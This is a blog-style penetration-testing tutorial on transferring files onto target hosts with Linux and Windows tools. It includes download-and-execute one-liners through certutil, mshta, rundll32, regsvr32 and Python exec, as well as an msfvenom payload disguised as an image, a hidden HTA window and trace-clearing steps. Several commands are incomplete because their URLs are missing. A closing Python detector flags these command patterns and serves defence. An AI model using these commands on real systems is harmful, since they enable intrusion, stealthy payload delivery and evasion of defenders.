Detailed tutorial on how to download files with command line and terminal (Win + Linux)

1. Introduction

During penetration testing, it is usually necessary to transfer some files to the target host in order to escalate privileges and maintain control. When direct transfer is inconvenient but the target host has a network connection, the files can be downloaded instead. In this article I summarize most of the download commands used on Windows and Linux; there may be omissions, but the commonly used ones are covered.

2. Linux

2.1 Wget

This tool is very feature-rich and works like a full-featured GUI download manager. It has all the features an ideal download manager needs: it can resume downloads, download multiple files, retry a download after a connection problem, and even limit the maximum download bandwidth.



Background download:

wget -b

To resume the download if the internet connection is interrupted:

wget -c

Download a file from a password-protected ftp repository:

wget --ftp-user=<user_name> --ftp-password=<Give_password> Download-url-address

2.2 Curl

Curl is another efficient download tool that can upload or download files with a single simple command. It supports pausing and resuming downloads, supports the largest number of web protocols, can estimate how much download time is left, and shows the download progress with a progress bar. It is a built-in tool of all Linux distributions.


curl -o um.mp4

With the -o option, provide a name and the downloaded file will be saved with that name; with the -O option, the file will be saved with the original name.

2.3 Axel

This is a great alternative to wget and is a lightweight download utility. It's actually an accelerator, because it opens multiple http connections to download individual file segments, so the file downloads faster.

apt-get install axel



2.4 Aria2

This is an open source command-line download accelerator that supports multiple ports and allows you to use the maximum bandwidth to download files. It is an easy-to-install and easy-to-use tool.

apt-get install aria2



2.5 Perl

Perl is an awesome language, you can do almost anything with it, and it's easy to do file downloads with it.

use LWP::Simple;
getstore("http://domain/file", "file");

Execute the script file like this:


2.6 Python

Python is also a popular mainstream scripting language with clear and concise code:

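import urllib2  # Python 2; on Python 3 use urllib.request instead
u = urllib2.urlopen('http://domain/file')
localFile = open('local_file', 'wb')  # binary mode keeps the bytes intact
localFile.write(u.read())
localFile.close()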

2.7 Ruby

Ruby is an object-oriented language, and the one the Metasploit framework is implemented in; of course it can also handle small tasks like downloading files.

require 'net/http'
Net::HTTP.start("") { |http|  # server host name goes between the quotes
  r = http.get("/file")
  open("save_location", "wb") { |file|
    file.write(r.body)
  }
}

Execute the script file like this:

ruby test.rb

2.8 PHP

As a server-side script, PHP can also implement the function of downloading files.

        <?php
        $data = @file("");   // URL of the file to fetch
        $lf = "local_file";
        $fh = fopen($lf, 'w');
        fwrite($fh, implode('', $data));  // write every line, not only the first
        fclose($fh);

Execute the script file like this:

php test.php

2.9 FTP

Under normal circumstances, uploading files over FTP takes an attacker many interactive steps. The following bash script accounts for that interaction and can be executed directly without any interactive prompts.

get file

Of course, you can also enter the interactive terminal according to the actual situation:

# After entering the username and password
lcd E:\file # Enter the file directory under the E drive
cd www # Go to the www directory on the server
get access.log # Download the access.log on the server to E:\file

2.10 Netcat

On the attacker's computer, enter:

cat file | nc -l 1234

This command serves the content of the file on local port 1234; whoever connects to this port is sent the content of the file.

Command on the target computer:

nc host_ip 1234 > file

This command connects to the attacker's computer and saves the received file content.

3. Windows

3.1 Powershell

PowerShell is a native scripting language of Windows. For those who are proficient with it, it can implement many complex functions.

The following two commands implement downloading a file from the Internet.

$p = New-Object System.Net.WebClient
# cmd-style %homepath% is not expanded inside a PowerShell string; use $env: instead
$p.DownloadFile("http://domain/file", "$env:USERPROFILE\file")

3.2 IPC$

copy \\c$\test.exe E:\file
cmd.exe /k < \\webdavserver\folder\batchfile.txt

3.3 Certutil

Applicable to: Windows Server 2003, Windows Server 2003 R2, Windows Server 2003 with SP1, Windows Server 2003 with SP2

certutil -urlcache -split -f file.exe
certutil -urlcache -split -f delete #Delete cache

certutil -verifyctl -split -f -split
#This command will download the original file as a temporary bin file, and it can run normally after changing the name back

The file is downloaded and executed as follows:

certutil -urlcache -split -f a.exe && a.exe &&  del a.exe && certutil -urlcache -split -f delete

3.4 Visual Basic

In 1998 the final Visual Basic standard was settled on Windows. The following code can download a file, although it is much longer than the PowerShell version.

Set args = Wscript.Arguments
Url = "http://domain/file"
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", Url, False
xHttp.Send
with bStrm
    .type = 1 ' binary
    .open
    .write xHttp.responseBody
    ' VBScript does not expand %variables% in strings by itself
    .savetofile createobject("WScript.Shell").ExpandEnvironmentStrings("%HOMEDRIVE%%HOMEPATH%\file"), 2 ' overwrite
end with

On Windows, the cscript command lets you execute VBS script files or change script settings. On Windows 7 this command is not required, but on Windows XP you need to use it, as follows:

cscript test.vbs

3.5 Tftp

In Windows Vista and later there is FTP by default, which can be run with the following command:


tftp -i IP address PUT C:\%homepath%\file remote storage location


tftp -i IP address GET C:\%homepath%\file local storage location

3.6 Bitsadmin

Bitsadmin is a Windows command-line tool that users can use to create download or upload tasks. From the command line it can only download to a specified path; Windows 7 or above:

bitsadmin /transfer myDownLoadJob /download /priority normal "" "E:\\phpstudy_pro\\WWW\\b.ps1"

bitsadmin /rawreturn /transfer getfile E:\file\test.txt

bitsadmin /rawreturn /transfer getpayload E:\file\test.txt

3.7 msiexec

msiexec /q /i

msfvenom -f msi -p windows/exec CMD=calc.exe > cacl.png

3.8 IEExec

C:\Windows\Microsoft.NET\Framework\v2.0.50727> caspol -s off

C:\Windows\Microsoft.NET\Framework\v2.0.50727> IEExec

3.9 Python

C:\python27\python.exe -c "import urllib2; exec urllib2.urlopen('').read();"

3.10 Mshta

mshta

The content of run.hta is as follows:

<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "cmd.exe /c net user" ' Fill in the command here
</script>

mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))

3.11 Rundll32

Depends on the component:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}%

3.12 Regsvr32

The Regsvr32 command is used to register COM components. It is a command provided by the Windows system to register controls with the system or uninstall controls. It is run in command line mode.

The regsvr32.exe of WinXP and above systems is in the windows\system32 folder; the regsvr32.exe of the 2000 system is in the winnt\system32 folder.

regsvr32 /u /s /i: scrobj.dll
copy content:

<?XML version="1.0"?>
    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
    <!-- Learn from Casey Smith @subTee -->
    <script language="JScript">
            ps  = "cmd.exe /c calc.exe";
            new ActiveXObject("WScript.Shell").Run(ps,0,true);


can also use generates sct files:

regsvr32 /u /s /i: scrobj.dll

3.13 Windows Share

Windows shares can mount a drive and then use commands to copy files.

Mount the remote drive:

net use x: \\\share /\userID myPassword

3.14 Format conversion

When you need to put an exe file on the target computer, Nishang can use PowerShell to allow you to convert an exe to hex, and then convert the hex back to the original exe file:

To convert the exe to a hex file, enter:

PS > .\ExetoText.ps1 evil.exe evil.txt

Open the evil.txt file, copy its content, and paste it to the target computer through the RDP clipboard. To restore the hex file to an exe file, enter:

PS > .\TexttoExe.ps1 evil.txt evil.exe

3.15 Others


msxsl.exe is a Microsoft program for processing XSL on the command line, so through it we can execute JavaScript and then execute system commands.


On Windows 7+ there exists a Microsoft signed WSH script named PubPrn.vbs located at



esentutl.exe /y "\\\share" /d"C:\Users\Public\" /0
extrac32.exe /Y /C \\\share\test.txt C:\Users\Public\test.txt



desktopimgdownldr.exe is located in the system32 folder of Win10 and was originally used to set the lock screen or desktop background image.

Ordinary users can use:

set "SYSTEMROOT=C:\ProgramData" && cmd /c desktopimgdownldr.exe /lockscreenurl:http://url/xxx.exe /eventName:desktopimgdownldr

This will download the file.


You can change C:\ProgramData to a directory writable by ordinary users.

The downloaded files are stored in:



Admin users will write one more registry entry, so the best command for an admin is:

set "SYSTEMROOT=C:\ProgramData\" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://url/file.exe /eventName:desktopimgdownldr && reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP /f
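The Windows commands in section 3 have recognizable command-line shapes, which is what lets a defender spot them in process-creation logs. The following is an added example, not code from the original article: it matches command lines against patterns modelled on the commands above. The rule names, host names and sample events are constructed for illustration.

```python
import re

# Patterns modelled on the Windows commands listed in section 3. The rule
# names are invented for this example and belong to no published rule set.
RULES = {
    "certutil_download": r"\bcertutil(\.exe)?\b.*[-/](urlcache|verifyctl)\b",
    "bitsadmin_transfer": r"\bbitsadmin(\.exe)?\b.*/transfer\b",
    "mshta_remote_script": r"\bmshta(\.exe)?\b.*(https?://|vbscript:|javascript:)",
    "regsvr32_scrobj": r"\bregsvr32(\.exe)?\b.*/i:.*\bscrobj\.dll\b",
    "rundll32_javascript": r"\brundll32(\.exe)?\b.*javascript:",
    "desktopimgdownldr_url": r"\bdesktopimgdownldr(\.exe)?\b.*/lockscreenurl:",
    "msiexec_remote_package": r"\bmsiexec(\.exe)?\b.*/i\s+\S*(https?://|\\\\)",
    "powershell_webclient": r"net\.webclient|\.downloadfile\(",
}
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in RULES.items()}


def match_rules(command_line):
    """Return the sorted names of every rule the command line triggers."""
    return sorted(n for n, rx in COMPILED.items() if rx.search(command_line))


def scan(events):
    """Return (host, command_line, rule_names) for each event that matches."""
    hits = []
    for host, command_line in events:
        rules = match_rules(command_line)
        if rules:
            hits.append((host, command_line, rules))
    return hits


# Constructed process-creation events (host, command line); example.test is
# a reserved name and the benign lines are there to show what is not flagged.
SAMPLE_EVENTS = [
    ("ws01", r"certutil -urlcache -split -f http://example.test/a.exe a.exe"),
    ("ws01", r"certutil -hashfile C:\Temp\a.bin SHA256"),
    ("ws02", r'bitsadmin /transfer job1 /download /priority normal "http://example.test/b.ps1" "C:\Temp\b.ps1"'),
    ("ws02", r"bitsadmin /list /allusers"),
    ("ws03", r"C:\Windows\System32\regsvr32.exe /u /s /i:http://example.test/f.sct scrobj.dll"),
    ("ws03", r"regsvr32 /s C:\Windows\System32\msxml3.dll"),
    ("ws04", r"cmd /c desktopimgdownldr.exe /lockscreenurl:http://example.test/x.exe /eventName:desktopimgdownldr"),
    ("ws04", r"msiexec /i C:\Installers\app.msi /qn"),
]

if __name__ == "__main__":
    for host, command_line, rules in scan(SAMPLE_EVENTS):
        print(host, ",".join(rules), command_line, sep=" | ")
```

Matches are triage signals rather than verdicts: administrative scripts legitimately use bitsadmin and WebClient, so weigh each hit together with the parent process and the destination.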


Tags: Python Linux Windows ftp

Posted by shooka on Sun, 20 Nov 2022 18:22:37 +1030